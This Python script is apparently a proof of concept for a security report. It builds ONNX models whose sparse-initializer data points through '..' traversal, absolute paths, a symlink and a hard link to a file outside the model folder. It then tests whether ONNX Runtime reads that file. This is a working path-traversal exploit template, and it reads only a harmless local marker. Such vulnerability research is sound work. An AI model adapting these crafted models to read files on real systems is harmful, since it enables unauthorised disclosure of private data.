"""Probe how ONNX / ONNX Runtime resolve external data of a sparse initializer.

The script builds a set of small ONNX models whose only content is a sparse
initializer. The *values* tensor of that sparse initializer is stored as
external data, and each model points the external ``location`` at a different
kind of path (plain file next to the model, ``..`` traversal, absolute path,
path through a directory symlink, hard link). Each model is then fed to the
ONNX checker, ``onnx.load`` and several ONNX Runtime loading modes, every one
in its own subprocess, and the outcome of each invocation is printed as
``key=value`` lines.

Exit status: 0 when at least one non-baseline ONNX Runtime invocation printed
the marker bytes, 1 otherwise.
"""
from __future__ import annotations

import hashlib
import os
import shutil
import subprocess
import sys
from pathlib import Path

import numpy as np
import onnx
import onnxruntime as ort
from onnx import TensorProto, helper, numpy_helper

ROOT = Path(__file__).resolve().parent
MODEL_DIR = ROOT / "model_dir"
OUTSIDE_DIR = ROOT / "outside_dir"
MARKER = b"ORT_SPARSE_INITIALIZER_EXT_READ"

# Upper bound, in seconds, for a single child interpreter.
_CHILD_TIMEOUT_S = 30
# Return code reported for a child that exceeded the timeout (same value the
# coreutils ``timeout`` command uses); it is non-zero so it never counts as a hit.
_TIMEOUT_RC = 124

# Child scripts executed with ``python -c``. Their content must start at
# column 0, which is why they live at module level instead of inside main().
_CHECKER_CODE = """
import onnx, sys
onnx.checker.check_model(sys.argv[1])
print("checker_ok")
"""

_ONNX_LOAD_CODE = """
import onnx, sys
model = onnx.load(sys.argv[1])
print("load_ok")
"""

_ORT_CODE = """
import onnxruntime as ort, sys
sess = ort.InferenceSession(sys.argv[1], providers=["CPUExecutionProvider"])
out = sess.run(None, {})[0]
print(bytes(out.tolist()).decode("ascii", errors="replace"))
"""

_ORT_BYTES_CODE = """
import onnxruntime as ort, sys
so = ort.SessionOptions()
so.add_session_config_entry("session.model_external_initializers_file_folder_path", sys.argv[2])
data = open(sys.argv[1], "rb").read()
sess = ort.InferenceSession(data, so, providers=["CPUExecutionProvider"])
out = sess.run(None, {})[0]
print(bytes(out.tolist()).decode("ascii", errors="replace"))
"""


def sha256(path: Path) -> str:
    """Return the hex SHA-256 digest of the full contents of *path*."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


def make_external_values(location: str) -> TensorProto:
    """Build the UINT8 values tensor whose payload lives in external data.

    Args:
        location: String stored verbatim under the ``location`` key of the
            tensor's ``external_data`` entries.

    Returns:
        A ``TensorProto`` named ``sparse_init`` with ``len(MARKER)`` elements,
        ``data_location`` set to ``EXTERNAL``, offset ``0`` and length
        ``len(MARKER)``.
    """
    values = TensorProto()
    values.name = "sparse_init"
    values.data_type = TensorProto.UINT8
    values.dims.append(len(MARKER))
    values.data_location = TensorProto.EXTERNAL
    values.external_data.add(key="location", value=location)
    values.external_data.add(key="offset", value="0")
    values.external_data.add(key="length", value=str(len(MARKER)))
    return values


def make_model(model_path: Path, location: str) -> None:
    """Write a model that routes a sparse initializer straight to its output.

    The graph has no inputs; a single ``Identity`` node copies the
    ``sparse_init`` initializer to the ``out`` graph output.

    Args:
        model_path: Destination file for the serialized model.
        location: External-data location recorded for the sparse values.
    """
    values = make_external_values(location)

    # One index per value: positions 0..len(MARKER)-1, shaped (len(MARKER), 1).
    indices_array = np.arange(len(MARKER), dtype=np.int64).reshape(len(MARKER), 1)
    indices = numpy_helper.from_array(indices_array, name="sparse_indices")
    sparse = helper.make_sparse_tensor(values, indices, [len(MARKER)])

    output = helper.make_tensor_value_info("out", TensorProto.UINT8, [len(MARKER)])
    identity_node = helper.make_node("Identity", inputs=["sparse_init"], outputs=["out"])
    graph = helper.make_graph(
        nodes=[identity_node],
        name="sparse_initializer_external",
        inputs=[],
        outputs=[output],
        sparse_initializer=[sparse],
    )
    model = helper.make_model(
        graph,
        producer_name="onnx-ort-sparse-initializer-external-poc",
        opset_imports=[helper.make_opsetid("", 18)],
    )
    model.ir_version = 10
    onnx.save_model(model, model_path)


def build_cases() -> dict[str, Path]:
    """Recreate the fixture directories and write one model per case.

    ``MODEL_DIR`` and ``OUTSIDE_DIR`` are deleted if they exist and created
    again, so anything previously stored in them is lost.

    Returns:
        Mapping from case name to the path of the model written for it.
    """
    for path in (MODEL_DIR, OUTSIDE_DIR):
        if path.exists():
            shutil.rmtree(path)
        path.mkdir(parents=True)

    outside_marker = OUTSIDE_DIR / "marker.bin"
    outside_marker.write_bytes(MARKER)
    (MODEL_DIR / "inside.bin").write_bytes(MARKER)
    # Directory symlink and hard link that both lead from inside MODEL_DIR to
    # the marker stored in OUTSIDE_DIR.
    os.symlink("../outside_dir", MODEL_DIR / "link_parent", target_is_directory=True)
    os.link(outside_marker, MODEL_DIR / "hardlink.bin")

    cases = {
        "inside_regular": "inside.bin",
        "dotdot_escape": "../outside_dir/marker.bin",
        "absolute_escape": str(outside_marker.resolve()),
        "parent_symlink_escape": "link_parent/marker.bin",
        "hardlink_escape": "hardlink.bin",
    }

    paths: dict[str, Path] = {}
    for name, location in cases.items():
        path = MODEL_DIR / f"{name}.onnx"
        make_model(path, location)
        paths[name] = path
    return paths


def _as_text(stream: str | bytes | None) -> str:
    """Normalize captured output attached to a ``TimeoutExpired`` to ``str``."""
    if stream is None:
        return ""
    if isinstance(stream, bytes):
        return stream.decode("utf-8", errors="replace")
    return stream


def run(code: str, cwd: Path, *args: Path | str) -> subprocess.CompletedProcess[str]:
    """Execute *code* with ``python -c`` in a fresh interpreter.

    Args:
        code: Python source passed to ``-c``.
        cwd: Working directory of the child process.
        *args: Extra command-line arguments; each is converted with ``str``.

    Returns:
        The completed process with captured text stdout/stderr. A non-zero
        exit status does not raise. If the child exceeds the timeout, a
        synthetic result with return code ``124`` is returned instead of
        raising, so one hung case cannot abort the remaining ones.
    """
    command = [sys.executable, "-c", code, *map(str, args)]
    try:
        return subprocess.run(
            command,
            cwd=cwd,
            text=True,
            capture_output=True,
            check=False,
            timeout=_CHILD_TIMEOUT_S,
        )
    except subprocess.TimeoutExpired as exc:
        # Output captured before the timeout may be bytes or None even though
        # text=True was requested, hence the normalization.
        partial_stderr = _as_text(exc.stderr)
        note = f"timeout after {exc.timeout}s"
        return subprocess.CompletedProcess(
            args=command,
            returncode=_TIMEOUT_RC,
            stdout=_as_text(exc.stdout),
            stderr=f"{partial_stderr}\n{note}" if partial_stderr else note,
        )


def emit(name: str, result: subprocess.CompletedProcess[str]) -> None:
    """Print return code, stdout and stderr of *result* as ``name_*=`` lines.

    Newlines inside the captured streams are replaced by ``" | "`` so that
    every field stays on a single output line.
    """
    stdout = result.stdout.strip().replace("\n", " | ")
    stderr = result.stderr.strip().replace("\n", " | ")
    print(f"{name}_rc={result.returncode}")
    print(f"{name}_stdout={stdout}")
    print(f"{name}_stderr={stderr}")


def main() -> int:
    """Build all cases, run every loader against them and report the outcome.

    Returns:
        0 if at least one ONNX Runtime invocation for a case other than
        ``inside_regular`` exited successfully and printed the marker text,
        otherwise 1.
    """
    paths = build_cases()
    outside_marker = OUTSIDE_DIR / "marker.bin"
    hardlink_stat = os.stat(MODEL_DIR / "hardlink.bin")

    print(f"python={sys.version.split()[0]}")
    print(f"onnx={onnx.__version__}")
    print(f"onnxruntime={ort.__version__}")
    print(f"case_dir={ROOT}")
    print(f"outside_marker={outside_marker}")
    print(f"outside_marker_sha256={sha256(outside_marker)}")
    print(f"hardlink_count={hardlink_stat.st_nlink}")
    print(f"hardlink_same_inode={hardlink_stat.st_ino == os.stat(outside_marker).st_ino}")

    marker_text = MARKER.decode("ascii")
    hits: list[str] = []
    for name, path in paths.items():
        print(f"{name}:model={path}")
        print(f"{name}:model_sha256={sha256(path)}")
        invocations = [
            ("onnx_checker", _CHECKER_CODE, MODEL_DIR, [path.name]),
            ("onnx_load", _ONNX_LOAD_CODE, MODEL_DIR, [path.name]),
            ("ort_file_relative", _ORT_CODE, MODEL_DIR, [path.name]),
            ("ort_file_absolute", _ORT_CODE, ROOT, [path]),
            ("ort_bytes_with_folder", _ORT_BYTES_CODE, ROOT, [path, MODEL_DIR]),
        ]
        for label, code, cwd, args in invocations:
            result = run(code, cwd, *args)
            emit(f"{name}_{label}", result)
            # "inside_regular" is the baseline; only the other cases, and only
            # the ONNX Runtime invocations, count towards the reported impact.
            is_hit = (
                name != "inside_regular"
                and label.startswith("ort_")
                and result.returncode == 0
                and marker_text in result.stdout
            )
            if is_hit:
                hits.append(f"{name}:{label}")

    if hits:
        print(f"impact=sparse_initializer_external_data_bypass:{','.join(hits)}")
        return 0
    print("impact=no_sparse_initializer_external_data_bypass")
    return 1


if __name__ == "__main__":
    raise SystemExit(main())